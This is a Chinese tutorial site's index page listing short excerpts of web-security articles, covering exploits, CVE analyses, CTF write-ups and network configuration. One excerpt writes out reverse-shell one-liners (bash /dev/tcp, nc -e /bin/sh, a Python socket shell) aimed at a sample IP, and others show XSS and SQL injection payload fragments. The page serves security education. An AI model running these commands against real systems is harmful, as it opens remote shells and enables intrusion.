第26页-web服务器安全_网站安全防护教程-php中文网

文章分类

全部

后端开发

全部 php教程 Python教程 Golang XML/RSS教程 C#.Net教程 C++

web前端

全部 js教程 html教程 css教程

数据库

全部 mysql教程 SQL

运维

全部 linux运维 CentOS

开发工具

全部 VSCode sublime composer

php框架

全部

博客

全部

常见问题

全部

科技周边

全部人工智能

Java

全部 java教程 Java面试题

系统教程

全部 Windows系列 LINUX MAC

电脑教程

全部电脑知识系统安装故障排查浏览器

硬件教程

全部硬件测评

手机教程

全部苹果手机安卓手机

软件教程

全部手机软件电脑软件办公软件

游戏教程

全部游戏攻略主机专区

自媒体

全部

新闻

全部 IT新闻硬件新闻手机新闻游戏新闻

如何利用深度链接方式后门化Facebook APP 近期，作者发现了Facebook安卓APP应用的一个深度链接漏洞，利用该漏洞，可以把用户手机上安装的Facebook安卓APP应用转变成后门程序（Backdoor），实现后门化。另外，利用该漏洞还可以重打包FacebookAPP，并将其发送给特定目标受害者安装使用。下面就来看看作者对该漏洞的发现过程，以及如何通过Payload构造，最终将其转化为FacebookAPP实际生产环境中的安全隐患。漏洞发现通常做众测时，我会先认真了解目标系统的应用机制。在我的上一篇博客中，我已经分享了通过解析Face

安全

2023.05.19 14:49:36

App Facebook

交换机的端口安全实例分析【实验名称】交换机的端口安全配置【实验目的】掌握交换机的端口安全功能，控制用户的安全接入【背景描述】你是一个公司的网络管理员，公司要求对网络进行严格控制。为了防止公司内部用户的IP地址冲突，防止公司内部的网络***和破坏行为。为每一位员工分配了固定的IP地址，并且限制只允许公司员工主机可以使用网络，不得随意连接其他主机。例如：某员工分配的IP地址是172.16.1.55/24，主机MAC地址是00-06-1B-DE-13-B4，该主机连接在1台2126G上边。【需求分析】针对交换机的所有端口，配

安全

2023.05.19 13:55:58

交换机

H3C端口安全技术是什么在网络日益发达的今天，安全是不得不关注的一个话题。而在企业中威胁交换机端口的行为比较多，例如未经授权的用户主机随意连接到企业的网络中。如员工自己笔记本，可以在不经管理员同意的情况下，拔下某台主机的网线，插在自己带来的笔记本，然后连入到企业的网络中，这会带来很大的安全隐患，很有可能造成机密资料的丢失。再比如说未经采用同意安装集线器HUB等网络设备。有些员工为了增加网络终端的数量，会在未经授权的情况下。将集线器、交换机等设备插入到办公室的网络接口上。如此的话，会导致这个网络接口对应的交换机接口流量增

安全

2023.05.19 12:46:46

h3c

基于GRE的IPSec实例分析 IPSecoverGRE

安全

2023.05.19 12:40:06

ipsec gre

xss的小测试是怎样进行的无安全方面的限制，直接使用alert(/xss/);限制条件：只能使用CSS，不允许使用html标签我们知道利用expression可以用来构造XSS，但是只能在IE下面测试，所以下面的测试请在IE6中执行。body{black;xss:alert(/xss/));/*IE6下测试*/}限制条件：对HTML进行了转义，Image标签可用。测试输入的字符会被插入到src地址中，那么可以使用伪协议来绕过。直接输入alert(/xss/);或者你也可以使用事件来绕过，注意闭合语句即可，如下：1&quo

安全

2023.05.19 11:37:06

xss

bash漏洞复现的示例分析 BourneAgainShell（简称BASH）是在GNU/Linux上最流行的SHELL实现，于1980年诞生，经过了几十年的进化从一个简单的终端命令行解释器演变成了和GNU系统深度整合的多功能接口。Bash，Unixshell的一种。1989年发布第一个正式版本，原先是计划用在GNU操作系统上，但能运行于大多数类Unix系统的操作系统之上，包括Linux与MacOSXv10.4都将它作为默认shell。它也被移植到MicrosoftWindows上的Cygwin与MinGW，或是可以在MS-

安全

2023.05.19 11:13:11

Bash

zabbix如何监控traceroute数据 1.zabbixserver和proxy安装mtrmtr脚本放置到zabbixserver和proxy如下路径：执行chownzabbix:zabbixmtrtrace.shzabbix创建mtrtrace模板：5.将主机关联到模板，zabbix中观察数据：【monitoring】-【latestdata】:

安全

2023.05.19 11:10:12

zabbix traceroute

Apache Solr velocity模板注入RCE漏洞的示例分析 0x01简介Solr是一个独立的企业级搜索应用服务器，它对外提供类似于Web-service的API接口。用户可以通过http请求，向搜索引擎服务器提交一定格式的XML文件，生成索引；也可以通过HttpGet操作提出查找请求，并得到XML格式的返回结果。0x02漏洞介绍Solr中存在VelocityResponseWriter组件,攻击者可以构造特定请求修改相关配置,使VelocityResponseWriter组件允许加载指定模板,进而导致Velocity模版注入远程命令执行漏洞，攻击者利用该

安全

2023.05.19 10:37:13

Solr Velocity

利用JIRA漏洞访问美军非保密因特网协议路由器网的示例分析下面讲述了作者在参与美国国防部（DoD）HackthePentagon漏洞众测项目中，利用JIRA漏洞CVE-2017-9506构造了SSRF攻击面，实现了对美军非保密因特网协议路由器网（NIPRnet）的访问，并且结合其它漏洞技巧，获取到DoD内网系统的一系列敏感信息。由于测试过程和内容的涉密性，该篇文章仅点到为止，未对过多技术细节和详细场景作出披露，仅当学习分享，还望读者多多包涵。JIRA是澳大利亚Atlassian公司开发的一款优秀的问题跟踪管理软件工具，可以对各种类型的问题进行跟踪管理，

安全

2023.05.18 22:29:09

jira

SQL注入类型有哪些前言SQL注入的攻击方式根据应用程序处理数据库返回内容的不同，可以分为可显注入、报错注入和盲注。可显注入攻击者可以直接在当前界面内容中获取想要获得的内容。报错注入数据库查询返回结果并没有在页面中显示，但是应用程序将数据库报错信息打印到了页面中，所以攻击者可以构造数据库报错语句，从报错信息中获取想要获得的内容。盲注数据库查询结果无法从直观页面中获取，攻击者通过使用数据库逻辑或使数据库库执行延时等方法获取想要获得的内容。Mysql手工注入lian合注入?id=1'orderby4--

安全

2023.05.18 22:05:12

SQL

反弹shell有哪些 1.bash反弹bash-i>&/dev/tcp/ip_address/port0>&12.nc反弹nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.

安全

2023.05.18 22:01:04

shell

NSA新型APT框架DarkPulsar怎么用前言2017年3月，ShadowBrokers放出了一份震惊世界的机密文档，其中包括两个框架：DanderSpritz和FuzzBunch。DanderSpritz完全由插件组成，用于收集情报、利用漏洞和操控已接管的设备。它基于Java编写，提供类似于僵尸网络管理面板的图形界面以及类似Metasploit工具的控制面板。它还整合了用于非FuzzBunch受控设备的后门和插件。DanderSprit界面概述Fuzzbunch为不同的实用程序提供了一个用于交互和协同工作的框架，包含各种类型的插件，其

安全

2023.05.18 20:14:58

nsa DarkPulsar

如何进行Ghostscript SAFER沙箱绕过漏洞的分析前言Ghostscript是一款AdobePostScript语言的解释器软件。可对PostScript语言进行绘图，支持PS与PDF互相转换。目前大多数Linux发行版中都默认安装，并移植到了Unix、MacOS、Windows等平台，且Ghostscript还被ImagineMagic、PythonPIL和各种PDF阅读器等程序所使用。漏洞描述8月21日，Google安全研究员TavisOrmandy披露了多个GhostScript的漏洞，通过在图片中构造恶意PostScript脚本，可以绕

安全

2023.05.18 19:10:39

ghostscript SAFER

DDCTF2019两个逆向分别是什么 01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的，直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"

安全

2023.05.18 17:13:20

DDCTF writeup

绕过限制访问到Google内部管理系统的示例分析蛛丝马迹某天，在挖掘谷歌漏洞的过程中，我从公开的漏洞中发现了一些谷歌自身服务的IP地址，一开始，我真不知道这些IP地址能干嘛。我就先检查了一遍这些IP地址，进一步发现其中包含了一些谷歌的内部IP。我突然想起来，最近，我的朋友KLSREERAM上报过一个谷歌内部IP相关的漏洞，另一个朋友Vishnu则上报过了一个利用谷歌子域名访问到控制面板的漏洞。目前，这两个漏洞都已被谷歌修复，这两个漏洞相关的内部IP地址也不能从互联网上访问到。但是，现在，在我面前就有几个谷歌内部IP地址，我得想办法来看看能不能

安全

2023.05.18 15:19:49

Google

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析一、漏洞简介DiskPulseEneterprise是一款监视磁盘变化的软件，它可以通过一个管理端口9120或者web管理窗口80对软件进行连接管理，从而监视磁盘的变化情况。在DiskPulseEneterprise中有一个动态链接库libspp.dll，其中有一些负责HTTP操作的函数，问题就出现在这个动态链接库中，在处理后数据时，由于对于后数据没有进行严格的长度控制，导致在执行获取后数据时向无效内存拷贝数据造成缓冲区溢出，触发SEH异常行为处理，最后控制EIP，执行任意代码。软件下载链接：h

安全

2023.05.18 15:04:07

window Disk Pulse Eneterprise

APP崩溃的主要原因是什么一、什么样的场景下容易出现崩溃类问题最近脑子里一直在想什么样的问题容易导致崩溃——那就是具有异常思维，举个例子：正好前两天看了一部美剧叫《菜鸟老警》，里面有个场景是主人公JohnNolan因为没有用警车拦住逃犯的车而导致逃犯出逃，这个场景与测试有什么关联呢？首先正常人在马路上行驶都会躲避避免与别人发生碰撞，这就好比测试功能的主流程，不会去乱点乱输入；但是警察就不一样了，他会为了抓住逃犯不顾一切，想尽一切办法，这就好比测试过程中的异常思维，要思考怎么样操作使功能不好用。宝典一、异常操作各种异常操作

安全

2023.05.18 13:55:06

App

MySQL数据库常用技巧有哪些 1、如何选择服务器的类型？MySQL服务器配置窗口中各个参数的含义如下。【ServerConfigurationType】该选项用于设置服务器的类型。单击该选项右侧的向下按钮，即可看到包括3个选项。3个选项的具体含义如下：DevelopmentMachine(开发机器)：该选项代表典型个人用桌面工作站。假定机器上运行着多个桌面应用程序。将MySQL服务器配置成使用最少的系统资源。ServerMachine(服务器)：该选项代表服务器，MySQL服务器可以同其它应用程序一起运行，例如FTP、ema

安全

2023.05.18 13:29:00

MySQL

SolarWinds供应链APT攻击事件安全风险的示例分析背景12月13日，美国顶级安全公司FireEye（中文名：火眼）发布报告称，其发现一起全球性入侵活动，命名该组织为UNC2452。该APT组织通过入侵SolarWinds公司，在SolarWindsOrion商业软件更新包中植入恶意代码，进行分发，FireEye称之为SUNBURST恶意软件。该后门包含传输文件、执行文件、分析系统、重启机器和禁用系统服务的能力，从而到达横向移动和数据盗窃的目的。SolarWindsOrionPlatform是一个强大、可扩展的基础架构监视和管理平台，它用于以单个

安全

2023.05.18 12:52:27

apt solarwinds

vBulletin 5.x 远程代码执行漏洞的示例分析 vBulletin组件介绍vBulletin是论坛和社区发布软件的全球领导者。其安全性，强大的管理功能和速度，可为40,000多个在线社区提供服务等特点备受客户青睐。很多大型论坛都选择vBulletin作为自己的社区。从vBulletin官方网站所展示的客户列表可以得知，著名的游戏制作公司EA、著名的游戏平台Steam、日本大型跨国企业Sony、以及美国NASA等均为其客户，vBulletin高效，稳定，安全，在中国也有很多大型客户，比如蜂鸟网，51团购，海洋部落等在线上万人的论坛都用vBull

安全

2023.05.18 11:46:45

vBulletin

24小时阅读排行榜

热门专题

php源码安装教程大全

2025.12.31

php网站源码教程大全

2025.12.31

视频文件格式

2025.12.31

不受国内限制的浏览器大全

2025.12.31

出现404解决方法大全

198

2025.12.31

html5怎么播放视频

2025.12.31

关闭win10系统自动更新教程大全

2025.12.31

阻止电脑自动安装软件教程

2025.12.31

html5怎么使用

2025.12.31

php如何本地部署教程

2025.12.31

精选课程

PHP实战天龙八部之微信支付视频教程

共5课时 | 17.3万人学习

PHP实战天龙八部之仿爱奇艺电影网站

共49课时 | 77.5万人学习

前端入门_HTML5

共29课时 | 62万人学习

CSS视频教程-玉女心经版

共25课时 | 39.5万人学习

JavaScript极速入门_玉女心经系列

共43课时 | 71.3万人学习

独孤九贱(1)_HTML5视频教程

共25课时 | 62万人学习

独孤九贱(2)_CSS视频教程

共22课时 | 23.1万人学习

独孤九贱(3)_JavaScript视频教程

共28课时 | 34.1万人学习

独孤九贱(4)_PHP视频教程

共89课时 | 125.9万人学习

独孤九贱(5)_ThinkPHP5视频教程

共74课时 | 125.5万人学习

热门下载

phpStudy 2018最新版

下载

vc9-vc14（32+64位）运行库合集（链接在下方）

下载

VC9 32位

下载

VC11 32位

下载

php程序员工具箱完整版

下载

VC14 32位

下载